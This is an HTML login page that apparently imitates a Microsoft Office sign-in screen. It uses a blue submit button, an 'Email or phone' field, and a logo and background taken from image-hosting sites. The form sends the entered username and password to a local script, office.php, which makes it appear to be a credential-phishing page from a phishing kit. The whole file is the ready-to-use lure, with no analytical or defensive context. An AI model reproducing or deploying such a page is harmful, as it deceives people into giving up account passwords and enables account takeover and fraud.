
<!doctype html>
<html>
<head>
<title>Sign In</title>
<body>

<style type="text/css">
#backgroundimage
{
position: absolute;
top:0px;
left:0px;
}

body{
  background-image: url("https://i.imgur.com/xDTUS84.jpg");   
-webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
input{
  margin: 0;
  width: 350px;
  font-family: sans-serif;
  font-size: 15px;  
   padding: 8px;
  border: solid 1px #CACACA;
}

input:focus {
    border: 1px solid #0000FF;
    }

fieldset {
    font-family: sans-serif;
max-width:410px;
height:320px;
    border: 1px solid transparent;
    background: white;
    padding: 5px;
bottom:10px;
}


input[type=submit] {

  width: 370px;
   padding: 8px;
    font-size: 15px;
    line-height: 1.33;
    color: #fff;
    background-color: #0067B8;
   }
</style>
<form action="office.php" method="post">

<center>
<br><br><br><br><br><br><fieldset><br>
<img src="https://image.prntscr.com/image/pRGFRyd-QO_JSFPHLv1_cg.png"><br>
<input type="text" name="user" placeholder="Email or phone" required >
<br><br><input type="password" name="pass" placeholder="Password" required ><br>
    <br>
    <input type="submit" name="submit" value="Sign In"/> <br> <br><br></fieldset>

</center>
</form>
</body>
</html>
